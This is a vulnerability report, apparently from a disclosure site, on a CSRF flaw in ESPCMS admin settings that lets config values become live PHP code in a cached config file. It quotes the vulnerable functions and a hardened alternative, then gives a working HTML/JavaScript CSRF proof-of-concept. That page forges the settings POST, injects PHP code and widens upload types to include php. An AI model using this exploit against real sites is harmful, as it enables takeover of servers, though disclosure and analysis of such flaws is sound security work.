### Brief description:
ESPCMS latest version: CSRF leads directly to getshell
### Details:
First, let's look at the code where the problem lives.
management.php (lines 711-741):
```php
function onsetsave() {
    $db_table = db_prefix . 'config';
    $commandfile = admin_ROOT . 'datacache/command.php';
    if (!$this->fun->filemode($commandfile)) {
        exit('false');
    }
    $old_ishtml = $this->CON['is_html'];
    $sql = 'SELECT * FROM ' . $db_table . ' WHERE groupid<=8 AND isline=0 ORDER BY groupid';
    $rs = $this->db->query($sql);
    while ($rsList = $this->db->fetch_assoc($rs)) {
        if ($rsList['groupid'] == 5 && !$this->get_app_view('bbs', 'isetup')) {
            continue;
        }
        if ($rsList['groupid'] == 7 && !$this->get_app_view('touch', 'isetup')) {
            continue;
        }
        if ($rsList['groupid'] == 8 && !$this->get_app_view('im', 'isetup')) {
            continue;
        }
        // the POSTed value is written to the config table as-is
        $db_set = "value='" . $this->fun->accept($rsList['valname'], 'P') . "'";
        $db_where = 'id=' . $rsList['id'];
        $this->db->query('UPDATE ' . $db_table . ' SET ' . $db_set . ' WHERE ' . $db_where);
    }
    $this->db->query("UPDATE $db_table SET value='" . admin_URL . "' WHERE valname='domain'");
    $this->systemfile(true);
    // ... (excerpt ends here)
}
```
Having seen this function, let's follow into $this->systemfile(true):
class_connector.php (lines 514-543):
```php
function systemfile($trueclass = false) {
    $commandfile = admin_ROOT . 'datacache/command.php';
    $varget = "4:'1T<#HO+W=W=RYE8VES<\"YC;B\`";
    if (!is_file($commandfile) || $trueclass) {
        $sConfig = "<?php\n";
        $sConfig = $sConfig . '// uptime:' . date('Y-m-d H:i:s', time()) . "\n";
        $sConfig = $sConfig . "// ECISP.CN \n";
        $sConfig = $sConfig . "\$CONFIG=Array(\n";
        $db_table = db_prefix . 'config';
        $sql = "SELECT valname,content,value,valtype FROM $db_table where isline=0 ORDER BY groupid";
        $rs = $this->db->query($sql);
        while ($rsList = $this->db->fetch_assoc($rs)) {
            $valname = $rsList['valname'];
            $value = $rsList['value'];
            $valtype = $rsList['valtype'];
            $content = $rsList['content'];
            if ($valtype == 'int' || $valtype == 'bool') {
                $value = empty($value) ? 0 : $value;
                $sConfig = $sConfig . "\x20\x20\x20\x20 '" . $valname . '\'=>' . $value . ",\n";
            } else {
                // $value is concatenated straight into PHP source, unescaped
                $sConfig = $sConfig . "\x20\x20\x20\x20 '" . $valname . '\'=>\'' . $value . "',\n";
            }
        }
        $sConfig = $sConfig . ")\n";
        $sConfig = $sConfig . '?' . '>';
        if (!$this->fun->filewrite($commandfile, $sConfig)) {
            exit('System File Error!');
        }
    }
    include $commandfile;
    // ... (excerpt ends here)
}
```
Now it is clear: the values are read out of the database unchanged and written into the cached config file. Let's walk through an example.
If we set a config value to sss', GPC (magic quotes) escapes it to sss\' before it is stored in the database, but when we read it back out it is sss' again. So when the config file is written, special characters receive effectively no processing at all.
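To make the defect concrete, here is an added example (not ESPCMS code) that reproduces the string-concatenation writer beside a hardened one. The hardened writer builds a PHP array and lets var_export() emit the source, so a value such as x'.phpinfo().'// stays an inert string, and the save handler checks a per-session CSRF token before touching the config; the 'csrf_token' name and session storage are assumptions, PHP 7+ is assumed.

```php
<?php
// Added example, not ESPCMS code. Shows why concatenating database values into
// a PHP source file is unsafe, and a hardened alternative plus a CSRF guard.

// Constructed sample rows, as returned from the config table once the database
// layer has undone the GPC escaping.
$rows = [
    ['valname' => 'sitename',      'valtype' => 'string', 'value' => 'test'],
    ['valname' => 'close_content', 'valtype' => 'string', 'value' => "x'.phpinfo().'//"],
    ['valname' => 'is_close',      'valtype' => 'int',    'value' => '0'],
];

// Vulnerable pattern, mirroring systemfile(): a quote in $value closes the
// literal, so the rest of the value is emitted as PHP code.
function build_config_unsafe(array $rows): string {
    $s = "<?php\n\$CONFIG=Array(\n";
    foreach ($rows as $r) {
        if ($r['valtype'] === 'int' || $r['valtype'] === 'bool') {
            $s .= "    '" . $r['valname'] . "'=>" . (empty($r['value']) ? 0 : $r['value']) . ",\n";
        } else {
            $s .= "    '" . $r['valname'] . "'=>'" . $r['value'] . "',\n";
        }
    }
    return $s . ");\n";
}

// Hardened pattern: assemble a PHP array first, then let var_export() produce
// the source text. It escapes quotes and backslashes, so a value never becomes code.
function build_config_safe(array $rows): string {
    $config = [];
    foreach ($rows as $r) {
        if ($r['valtype'] === 'int' || $r['valtype'] === 'bool') {
            $config[$r['valname']] = (int) $r['value'];   // force numeric, never raw text
        } else {
            $config[$r['valname']] = (string) $r['value'];
        }
    }
    return "<?php\n\$CONFIG = " . var_export($config, true) . ";\n";
}

// CSRF guard for the save handler: a random per-session token must be echoed
// back in the POST body. Token name and session storage are assumptions.
function csrf_token_valid(array $session, array $post): bool {
    return isset($session['csrf_token'], $post['csrf_token'])
        && hash_equals((string) $session['csrf_token'], (string) $post['csrf_token']);
}

echo build_config_unsafe($rows); // close_content line becomes 'x'.phpinfo().'//', i.e. live code
echo build_config_safe($rows);   // close_content stays the string 'x\'.phpinfo().\'//'
```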
Watch me do it:
![15.png](https://images.seebug.org/upload/201409/111429125550a12c5eece093ed4bb64bc388b2d1.png)
Let's visit command.php and see the effect:
![16.png](https://images.seebug.org/upload/201409/11143004260d507b04d51f599d1554c486206d65.png)
Executed perfectly..........
```html
<html>
<body>
<script>
function csrf_shell(){
    var xhr = new XMLHttpRequest();
    xhr.open("POST", "http://192.168.10.70/ESPCMSV6000140909_INSTALL/upload/adminsoft/index.php?archive=management&action=setsave", true);
    xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
    xhr.withCredentials = "true";
    var body='is_close=0&close_content=%E6%8A%B1%E6%AD%89%EF%BC%9A%E7%BD%91%E7%AB%99%E6%AD%A3%E5%9C%A8%E7%BB%B4%E6%8A%A4%E4%B8%AD%EF%BC%8C%E7%BB%99%E6%82%A8%E5%B8%A6%E6%9D%A5%E4%B8%8D%E4%BE%BF%E6%B7%B1%E8%A1%A8%E6%AD%89%E6%84%8F%EF%BC%81\'%2Bphpinfo()%2C%2F%2F&icpbeian=&sitename=test&admine_mail=admin%40admin.com&is_log=1&is_gzip=1&cli_time=8&default_lng=cn&is_alonelng=0&home_lng=cn&is_html=0&is_rewrite=0&file_fileex=html&entrance_file=index&file_htmldir=html%2F&is_getcache=0&is_caching=0&cache_time=3600&http_pathtype=1&member_menu=1&mem_isclose=1&mem_isseccode=1&mem_regisseccode=0&mem_isemail=0&mem_lock=www%2Cbbs%2Cdemo%2Ctest%2Cftp%2Cmail%2Cuser%2Cusers%2Cadmin%2Cadministrator&mem_isclass=0&mem_did=cn%3A0%2Cen%3A0&mem_isaddress=0&mem_isucenter=0&mem_ucdbhost=localhost&mem_ucdbuser=root&mem_ucdbpw=&mem_ucdbname=ucenter&mem_ucdbchart=utf8&mem_ucdbtable=uc_&mem_uckey=sdaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&mem_ucapi=&mem_ucchart=utf-8&mem_ucapiid=0&enquiry_menu=1&is_enquiry_memclass=0&order_menu=1&order_ismember=1&order_integral=10&order_discount=100&order_snfont=ESP-&order_moneytype=%EF%BF%A5&order_max_list=3&order_companyname=&order_contact=&order_province=&order_city=&order_add=&order_post=&order_tel=&order_moblie=&upfile_pictype=jpg%7Cpng%7Cgif%7Cphp&uifile_movertype=swf%7Cmpg%7Cflv%7Cmp4&upfile_filetype=zip%7Crar%7Cdoc%7Cxls%7Cpdf&upfile_maxsize=100000000&img_dirtype=m3&img_cfiletype=d&img_width=200&img_height=200&img_bgcolor=%23ffffff&img_quality=80&img_issmallpic=0&img_iszoom=1&img_iswater=0&img_wmt_text=ESPCMS&img_wmt_size=25&img_wmt_color=%23ffffff&img_wmt_pos=9&img_wmt_transparent=20&img_wmi_file=watermark.png&img_wmi_pos=9&img_wmi_transparent=50&input_isdes=1&input_isdescription=250&input_isdellink=0&is_inputclose=1&input_click=0&is_keylink=1&input_color=%23000000&is_email=0&smtp_type=2&mail_cat=1&smtp_server=&smtp_port=25&mail_send=&smtp_username=&smtp_password=&is_moblie=0&moblie_userid=&moblie_smssnid=&moblie_smskey=&moblie_number=&sitecoedb=7a6355a4a18b136036439cc61efe069b&scode_bgcolor=%230080ff&scode_fontcolor=%23ffffff&scode_adulterate=1&scode_shadow=0&tip_searchtime=10';
    var aBody = new Uint8Array(body.length);
    for (var i = 0; i < aBody.length; i++)
        aBody[i] = body.charCodeAt(i);
    xhr.send(new Blob([aBody]));
}
csrf_shell();
</script>
</body>
</html>
```
Done.
### Proof of vulnerability: